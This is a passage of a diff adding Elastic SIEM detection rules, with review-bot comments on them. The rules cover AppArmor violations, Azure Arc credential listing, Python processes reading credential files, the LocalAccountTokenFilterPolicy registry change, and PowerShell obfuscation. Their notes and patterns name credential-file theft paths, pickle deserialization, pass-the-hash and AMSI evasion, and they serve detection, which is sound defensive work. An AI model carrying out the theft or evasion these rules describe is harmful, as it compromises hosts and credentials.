`/etc/apparmor.d/`, or appeared on multiple hosts, because these are strong indicators of active exploitation or wider compromise.\n- Harden the environment by keeping AppArmor in enforce mode, restoring any modified profiles, patching the vulnerable application or package the attacker abused, removing unnecessary interpreter access and write permissions for the service, and adding detections for the same blocked shell, file, or socket behaviors across similar systems.", + "query": "file where host.os.type == \"linux\" and event.type == \"change\" and event.action == \"violated-apparmor-policy\"\n", + "references": [ + "https://cdn2.qualys.com/advisory/2026/03/10/crack-armor.txt", + 
"https://blog.qualys.com/vulnerabilities-threat-research/2026/03/12/crackarmor-critical-apparmor-flaws-enable-local-privilege-escalation-to-root" + ], + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "02137bc2-5cc2-4f7f-a8e4-c52dc239aa69", + "setup": "## Setup\n\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. 
However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule no additional audit rules are required to be added to the integration.\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Auditd Manager", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "02137bc2-5cc2-4f7f-a8e4-c52dc239aa69_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/022c37cd-5a4f-422b-8227-b136b7a23180_1.json b/packages/security_detection_engine/kibana/security_rule/022c37cd-5a4f-422b-8227-b136b7a23180_1.json new file mode 100644 index 00000000000..8805bab467a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/022c37cd-5a4f-422b-8227-b136b7a23180_1.json 
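Review bot: The ATT&CK mapping in the `threat` block (T1562.001, Disable or Modify Tools) does not match what the `query` fires on: a `violated-apparmor-policy` event is AppArmor enforcing a profile, not AppArmor being disabled or modified, and the description itself frames the event as attempted privilege escalation or restricted file access. Mapping to Privilege Escalation (TA0004 / T1068) or Credential Access would fit the query; a Defense Evasion mapping only makes sense if tampering with `/etc/apparmor.d/` is added to what the rule matches. Separately, `file where` restricts the rule to `event.category: file` while the description covers socket and capability denials; if the auditd_manager integration categorizes those denials differently (not verifiable from this diff), `any where host.os.type == "linux" and event.action == "violated-apparmor-policy"` would cover them. Finally, the CrackArmor references describe flaws in AppArmor itself whose exploitation a blanket denial rule does not detect; the note should say so, or the references belong on a more targeted rule.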
@@ -0,0 +1,134 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when a service principal or user performs an Azure Arc cluster credential listing operation from a source IP not previously associated with that identity. The `listClusterUserCredential` action retrieves credentials for the Arc Cluster Connect proxy, enabling kubectl access through the Azure ARM API. An adversary using stolen service principal credentials will typically call this operation from infrastructure not previously seen for that SP. By tracking the combination of caller identity and source IP, this rule avoids false positives from backend services and CI/CD pipelines that rotate IPs but maintain consistent identity-to-IP patterns over time.", + "false_positives": [ + "A service principal used by a CI/CD pipeline may trigger this rule when the pipeline runs from a new IP range for the first time (e.g., migrating to a new runner pool). The 7-day history window will learn the new IPs after the first occurrence.", + "Administrators accessing Arc clusters from a new VPN endpoint or travel location. Validate the caller identity matches an expected user and correlate with known travel or access patterns." 
+ ], + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-azure.activitylogs-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "azure.activitylogs.operation_name", + "azure.activitylogs.identity.claims.appid", + "azure.activitylogs.identity.authorization.evidence.role", + "azure.activitylogs.identity.authorization.evidence.principalType", + "azure.resource.id", + "source.ip", + "source.geo.country_name", + "source.geo.city_name", + "source.as.organization.name" + ] + }, + "language": "kuery", + "license": "Elastic License v2", + "name": "Azure Arc Cluster Credential Access by Identity from Unusual Source", + "new_terms_fields": [ + "azure.activitylogs.identity.claims.appid", + "source.ip" + ], + "note": "## Triage and analysis\n\n### Investigating Azure Arc Cluster Credential Access by Identity from Unusual Source\n\nThe `listClusterUserCredential` operation on an Azure Arc-connected cluster returns credentials that allow the caller\nto establish a proxy tunnel via `az connectedk8s proxy`. 
This proxy routes kubectl commands through the Azure ARM API,\nenabling Kubernetes access without direct network connectivity to the cluster API server.\n\n### Possible investigation steps\n\n- Identify the caller service principal using `azure.activitylogs.identity.claims.appid` and cross-reference with\n Azure AD to determine if this is a known application.\n- Check the source IP and geolocation \u2014 is this from a country or ASN where your organization operates?\n- Correlate with Azure Sign-In Logs around the same time to see the full authentication chain (SP login followed by\n credential listing).\n- Verify the Azure role used \u2014 the `Azure Arc Enabled Kubernetes Cluster User Role` is required for this operation.\n Was this role recently assigned?\n- Check if subsequent Arc-proxied operations (secret/configmap CRUD) occurred after the credential access.\n- Review the service principal creation date in Azure AD \u2014 recently created SPs are more suspicious.\n\n### Response and remediation\n\n- If the source IP is from an unexpected country or the service principal is not recognized, treat as potential\n credential compromise.\n- Revoke the service principal credentials and remove Arc RBAC role assignments.\n- Review Kubernetes audit logs for any operations performed through the Arc proxy after credential access.\n- Rotate any Kubernetes secrets that may have been accessed.\n", + "query": "event.dataset: \"azure.activitylogs\"\n and azure.activitylogs.operation_name: \"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/LISTCLUSTERUSERCREDENTIAL/ACTION\"\n and event.outcome: (Success or success)\n", + "references": [ + "https://learn.microsoft.com/en-us/azure/azure-arc/kubernetes/cluster-connect", + "https://learn.microsoft.com/en-us/cli/azure/connectedk8s#az-connectedk8s-proxy", + "https://www.ibm.com/think/x-force/identifying-abusing-azure-arc-for-hybrid-escalation-persistence", + "https://nvd.nist.gov/vuln/detail/cve-2022-37968" + ], + "related_integrations": [ + 
{ + "integration": "activitylogs", + "package": "azure", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "022c37cd-5a4f-422b-8227-b136b7a23180", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Azure", + "Data Source: Azure Arc", + "Data Source: Azure Activity Logs", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Credential Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.004", + "name": "Cloud Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1552", + "name": "Unsecured Credentials", + "reference": "https://attack.mitre.org/techniques/T1552/", + "subtechnique": [ + { + "id": "T1552.007", + "name": "Container API", + "reference": "https://attack.mitre.org/techniques/T1552/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 1 + }, + "id": "022c37cd-5a4f-422b-8227-b136b7a23180_1", + "type": "security-rule" +} \ No newline at end of file 
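Review bot: The `new_terms_fields` pair `azure.activitylogs.identity.claims.appid` + `source.ip` keys the 7-day baseline on the application ID, but the description says the rule tracks service principals or users; for interactive callers the `appid` claim is typically the client application's ID (Azure CLI, portal) shared by every user of that client, so one user's new IP teaches the rule that IP for all of them, and an event without the claim at all produces no term and no alert. Consider adding the caller's object ID claim to `new_terms_fields` (verify the exact flattened claim field the integration emits), or state in the description that the rule is effectively service-principal-only. The same identity field in `investigation_fields` would also give analysts the pivot into Sign-In logs that the guide recommends.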
diff --git a/packages/security_detection_engine/kibana/security_rule/03b150d9-9280-4eb8-9906-38cfb6184666_1.json b/packages/security_detection_engine/kibana/security_rule/03b150d9-9280-4eb8-9906-38cfb6184666_1.json
new file mode 100644
index 00000000000..8b14e5ec031
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/03b150d9-9280-4eb8-9906-38cfb6184666_1.json
@@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the first time a Python process accesses sensitive credential files on a given host. This behavior may indicate post-exploitation credential theft via a malicious Python script, compromised dependency, or malicious model file deserialization. Legitimate Python processes do not typically access credential files such as SSH keys, AWS credentials, browser cookies, Kerberos tickets, or keychain databases, so a first occurrence is a strong indicator of compromise.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-endpoint.events.file-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "First Time Python Accessed Sensitive Credential Files", + "new_terms_fields": [ + "host.id", + "file.path" + ], + "note": "## Triage and analysis\n\n### Investigating First Time Python Accessed Sensitive Credential Files\n\nAttackers who achieve Python code execution \u2014 whether through malicious scripts, compromised dependencies, or model file deserialization (e.g., pickle/PyTorch `__reduce__`) \u2014 often target sensitive credential files such as SSH keys, cloud provider credentials, browser session cookies, and macOS keychain data. 
Since legitimate Python processes do not typically access these files, a first occurrence from a Python process is highly suspicious.\n\nThis rule leverages the Elastic Defend sensitive file `open` event, which is only collected for known sensitive file paths, combined with the New Terms rule type to alert on the first time a specific credential file is accessed by Python on a given host within a 7-day window.\n\n### Possible investigation steps\n\n- Examine the Python process command line and arguments to identify the script or command that triggered the file access.\n- Determine if the Python process was loading a model file (look for `torch.load`, `pickle.load`), running a standalone script, or executing via a compromised dependency.\n- Review the specific credential file that was accessed and assess the potential impact (SSH keys enable lateral movement, AWS credentials enable cloud access, browser cookies enable session hijacking).\n- Check for outbound network connections from the same process tree that may indicate credential exfiltration.\n- Investigate the origin of any recently downloaded scripts, packages, or model files on the host.\n- Look for file creation events in `/tmp/` or other staging directories that may contain copies of the stolen credentials.\n\n### False positive analysis\n\n- Python-based secret management tools (e.g., `aws-cli`, `gcloud`) legitimately access credential files. Consider excluding known trusted executables by process path.\n- SSH automation scripts using `paramiko` or `fabric` may read SSH keys. 
Evaluate whether the access pattern matches known automation workflows.\n- Security scanning tools running Python may enumerate credential files as part of their assessment.\n\n### Response and remediation\n\n- Immediately rotate any credentials that were potentially accessed (SSH keys, AWS access keys, cloud tokens).\n- Quarantine the Python process and investigate the source script, package, or model file that triggered the access.\n- If a malicious file is confirmed, identify all hosts where it may have been distributed.\n- Review outbound network connections from the host around the time of the credential access to check for exfiltration.\n- Consider implementing `weights_only=True` enforcement for PyTorch model loading across the environment.\n", + "query": "event.category:file and host.os.type:macos and event.action:open and\nprocess.name:python*\n", + "references": [ + "https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle-file-attacks-part-1/", + "https://github.com/trailofbits/fickling" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "03b150d9-9280-4eb8-9906-38cfb6184666", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", + "Domain: LLM" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1555", + "name": "Credentials from Password Stores", + 
"reference": "https://attack.mitre.org/techniques/T1555/", + "subtechnique": [ + { + "id": "T1555.001", + "name": "Keychain", + "reference": "https://attack.mitre.org/techniques/T1555/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 1 + }, + "id": "03b150d9-9280-4eb8-9906-38cfb6184666_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_318.json b/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_318.json new file mode 100644 index 00000000000..2a5cd9d68ff --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_318.json 
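Review bot: `process.name:python*` in the `query` is a case-sensitive keyword match, and python.org framework builds on macOS run as a process named `Python` (the `bin/python3` launcher execs `Python.app/Contents/MacOS/Python`), so those interpreters appear to fall outside the rule; `process.name:(python* or Python*)` would cover both spellings. The rule also depends entirely on the behaviour stated in the note that Elastic Defend only emits `open` events for known sensitive paths; if that collection scope ever widens this silently becomes "first time Python opened any file", so anchoring the query on `file.path` patterns (`~/.ssh/*`, `~/.aws/credentials`, the Keychain and browser cookie databases) or on whichever Defend field flags a sensitive file would make the intent explicit and the rule robust. Lastly, the `threat` block maps only to T1555.001 (Keychain) while the description covers SSH keys, cloud credentials and browser cookies; adding T1552.001 (Credentials In Files) and T1552.004 (Private Keys) would make the mapping match the detection.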
@@ -0,0 +1,148 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies registry modification to the LocalAccountTokenFilterPolicy policy. If this value exists (which doesn't by default) and is set to 1, then remote connections from all local members of Administrators are granted full high-integrity tokens during negotiation.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*", + "logs-sentinel_one_cloud_funnel.*", + "logs-m365_defender.event-*", + "logs-crowdstrike.fdr*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Local Account TokenFilter Policy Disabled", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Local Account TokenFilter Policy Disabled\n\nThe LocalAccountTokenFilterPolicy is a Windows registry setting that, when enabled, allows remote connections from local administrators to use full high-integrity tokens. Adversaries may exploit this to bypass User Account Control (UAC) and gain elevated privileges remotely. 
The detection rule monitors changes to this registry setting, identifying potential unauthorized modifications that could indicate an attempt to facilitate lateral movement or evade defenses.\n\n### Possible investigation steps\n\n- Review the registry event logs to confirm the change to the LocalAccountTokenFilterPolicy setting, specifically looking for entries where the registry.value is \"LocalAccountTokenFilterPolicy\" and registry.data.strings is \"1\" or \"0x00000001\".\n- Identify the user account and process responsible for the registry modification by examining the associated event logs for user and process information.\n- Check for any recent remote connections to the affected system, focusing on connections initiated by local administrator accounts, to determine if the change was exploited for lateral movement.\n- Investigate any other recent registry changes on the host to identify potential patterns of unauthorized modifications that could indicate broader malicious activity.\n- Correlate the event with other security alerts or logs from data sources like Elastic Endgame, Elastic Defend, Sysmon, SentinelOne, or Microsoft Defender for Endpoint to gather additional context and assess the scope of the potential threat.\n- Assess the system for signs of compromise or malicious activity, such as unusual processes, network connections, or file modifications, that may have occurred around the time of the registry change.\n\n### False positive analysis\n\n- Administrative tools or scripts that modify the LocalAccountTokenFilterPolicy for legitimate configuration purposes may trigger alerts. To manage this, identify and document these tools, then create exceptions for their known registry changes.\n- System updates or patches that adjust registry settings as part of their installation process can cause false positives. 
Monitor update schedules and correlate alerts with these activities to determine if they are benign.\n- Security software or management solutions that enforce policy changes across endpoints might modify this registry setting. Verify these actions with your IT or security team and consider excluding these processes from triggering alerts.\n- Custom scripts or automation tasks used for system hardening or configuration management may alter this setting. Review these scripts and whitelist their expected changes to prevent unnecessary alerts.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further unauthorized access or lateral movement.\n- Revert the registry setting for LocalAccountTokenFilterPolicy to its default state if it was modified without authorization.\n- Conduct a thorough review of recent administrative activities and access logs on the affected system to identify any unauthorized access or changes.\n- Reset passwords for all local administrator accounts on the affected system to prevent potential misuse of compromised credentials.\n- Deploy endpoint detection and response (EDR) tools to monitor for any further suspicious activities or attempts to modify registry settings.\n- Escalate the incident to the security operations center (SOC) for further investigation and to determine if the threat is part of a larger attack campaign.\n- Implement additional network segmentation and access controls to limit administrative access to critical systems and reduce the risk of similar threats.", + "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and\n registry.value : \"LocalAccountTokenFilterPolicy\" and\n registry.path : (\n \"HKLM\\\\*\\\\LocalAccountTokenFilterPolicy\",\n \"\\\\REGISTRY\\\\MACHINE\\\\*\\\\LocalAccountTokenFilterPolicy\",\n \"MACHINE\\\\*\\\\LocalAccountTokenFilterPolicy\"\n ) and registry.data.strings : (\"1\", \"0x00000001\") and\n not process.executable : 
(\n /* Intune */\n \"C:\\\\Windows\\\\system32\\\\deviceenroller.exe\",\n \"C:\\\\Windows\\\\system32\\\\omadmclient.exe\",\n \"C:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"C:\\\\Windows\\\\UUS\\\\Packages\\\\Preview\\\\amd64\\\\MoUsoCoreWorker.exe\",\n\n /* Crowdstrike specific exclusion as it uses NT Object paths */\n \"\\\\Device\\\\HarddiskVolume*\\\\system32\\\\deviceenroller.exe\",\n \"\\\\Device\\\\HarddiskVolume*\\\\system32\\\\omadmclient.exe\",\n \"\\\\Device\\\\HarddiskVolume*\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"\\\\Device\\\\HarddiskVolume*\\\\UUS\\\\Packages\\\\Preview\\\\amd64\\\\MoUsoCoreWorker.exe\"\n )\n", + "references": [ + "https://www.stigviewer.com/stig/windows_server_2008_r2_member_server/2014-04-02/finding/V-36439", + "https://posts.specterops.io/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy-506c25a7c167", + "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "crowdstrike", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.value", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "07b1ef73-1fde-4a49-a34a-5dd40011b076", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: 
Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + }, + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1550", + "name": "Use Alternate Authentication Material", + "reference": "https://attack.mitre.org/techniques/T1550/", + "subtechnique": [ + { + "id": "T1550.002", + "name": "Pass the Hash", + "reference": "https://attack.mitre.org/techniques/T1550/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 318 + }, + "id": "07b1ef73-1fde-4a49-a34a-5dd40011b076_318", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/083383af-b9a4-42b7-a463-29c40efe7797_6.json b/packages/security_detection_engine/kibana/security_rule/083383af-b9a4-42b7-a463-29c40efe7797_6.json deleted file mode 100644 index 3cb6f4cc706..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/083383af-b9a4-42b7-a463-29c40efe7797_6.json +++ /dev/null 
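Review bot: The `process.executable` exclusions for `deviceenroller.exe`, `omadmclient.exe` and `MoUsoCoreWorker.exe` mean a `LocalAccountTokenFilterPolicy = 1` delivered through Intune/MDM policy is dropped entirely, so an adversary with Intune administrator access can enable full-token remote logon for local administrators fleet-wide without tripping this rule; consider surfacing MDM-driven changes under a separate low-severity rule rather than excluding them, and call the gap out in the false-positive section. The exclusions are plain path globs, so a binary planted at one of those paths bypasses the rule (low likelihood, since it needs SYSTEM/TrustedInstaller-level write, but cheap to close); where the data source populates it, pairing each exclusion with `process.code_signature.trusted == true and process.code_signature.subject_name == "Microsoft Windows"` would tighten it. Minor: the rule `name` says "Policy Disabled" while the query matches the value being set to `1`, which enables the policy and thereby disables remote UAC token filtering; "LocalAccountTokenFilterPolicy Enabled" or "Remote UAC Token Filtering Disabled" would read unambiguously. What changed between version 317 and 318 is not visible in this new-file hunk.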
@@ -1,173 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies PowerShell scripts that use concatenated strings within dynamic command invocation (&() or .()) as a form of obfuscation. These methods are designed to evade static analysis and bypass security protections such as the Antimalware Scan Interface (AMSI).", - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Potential PowerShell Obfuscation via Concatenated Dynamic Command Invocation", - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential PowerShell Obfuscation via Concatenated Dynamic Command Invocation\n\nPowerShell is a powerful scripting language used for task automation and configuration management in Windows environments. Adversaries exploit its capabilities by obfuscating commands to evade detection, often using concatenated strings in dynamic invocations. This detection rule identifies such obfuscation by analyzing script patterns, specifically looking for concatenated strings within dynamic command invocations, which are indicative of attempts to bypass security measures like AMSI. 
By counting these patterns, the rule effectively flags suspicious scripts, aiding in the identification of potential threats.\n\n### Possible investigation steps\n\n- Review the `powershell.file.script_block_text` field to understand the content and purpose of the script, focusing on the concatenated strings and dynamic command invocations.\n- Check the `host.name` and `user.id` fields to identify the machine and user account associated with the execution of the suspicious script, which can help determine if the activity is expected or anomalous.\n- Analyze the `file.path` field to locate the script's source or storage location, which may provide additional context or indicate if the script is part of a known application or process.\n- Investigate the `powershell.file.script_block_id` and `powershell.sequence` fields to trace the execution sequence and correlate it with other related PowerShell activities, which might reveal a broader pattern of behavior.\n- Assess the `agent.id` field to determine the specific endpoint agent involved, which can assist in further endpoint-specific investigations or actions.\n\n### False positive analysis\n\n- Scripts with legitimate concatenated strings for dynamic command execution may trigger the rule. Review the script context to determine if the concatenation serves a valid administrative purpose.\n- Automated scripts from trusted sources that use concatenation for modularity or readability might be flagged. Consider adding these scripts to an allowlist if they are verified as safe.\n- Development or testing environments where PowerShell scripts are frequently modified and tested could generate false positives. Implement exceptions for known development hosts or user accounts.\n- Security tools or monitoring solutions that use PowerShell for legitimate operations may inadvertently match the pattern. 
Identify these tools and exclude their operations from the rule.\n- Regularly review and update the exclusion list to ensure it reflects the current environment and does not inadvertently allow malicious activity.\n\n### Response and remediation\n\n- Isolate the affected host immediately to prevent further execution of potentially malicious scripts and limit lateral movement within the network.\n- Terminate any suspicious PowerShell processes identified by the alert to halt the execution of obfuscated commands.\n- Conduct a thorough review of the script block text and associated script block ID to understand the intent and potential impact of the obfuscated commands.\n- Remove any unauthorized or malicious scripts from the affected system and ensure that all legitimate scripts are verified and signed.\n- Restore the affected system from a known good backup if any malicious activity is confirmed, ensuring that all data integrity checks are performed.\n- Escalate the incident to the security operations team for further analysis and to determine if additional systems have been compromised.\n- Update endpoint protection and monitoring tools to enhance detection capabilities for similar obfuscation techniques, leveraging insights from the MITRE ATT&CK framework.\n", - "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\" and powershell.file.script_block_text like \"*+*\"\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(\n powershell.file.script_block_text,\n \"\"\"[.&]\\(\\s*(['\"][A-Za-z0-9.-]+['\"]\\s*\\+\\s*)+['\"][A-Za-z0-9.-]+['\"]\\s*\\)\"\"\",\n \"\ud83d\udd25\"\n)\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = 
length(Esql.script_block_tmp) - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_tmp,\n powershell.file.*,\n file.path,\n powershell.sequence,\n powershell.total,\n _id,\n _version,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts that match the pattern at least once\n| where Esql.script_block_pattern_count >= 1\n", - "related_integrations": [ - { - "package": "windows", - "version": "^3.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "Esql.script_block_pattern_count", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_tmp", - "type": "keyword" - }, - { - "ecs": false, - "name": "_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "_index", - "type": "keyword" - }, - { - "ecs": false, - "name": "_version", - "type": "long" - }, - { - "ecs": true, - "name": "agent.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_entropy_bits", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_hash", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_length", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.file.script_block_surprisal_stdev", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_text", - "type": "text" - }, - { - "ecs": false, - "name": "powershell.file.script_block_unique_symbols", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.sequence", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.total", - "type": "long" 
- }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "083383af-b9a4-42b7-a463-29c40efe7797", - "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "severity": "high", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1027", - "name": "Obfuscated Files or Information", - "reference": "https://attack.mitre.org/techniques/T1027/" - }, - { - "id": "T1140", - "name": "Deobfuscate/Decode Files or Information", - "reference": "https://attack.mitre.org/techniques/T1140/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.001", - "name": "PowerShell", - "reference": 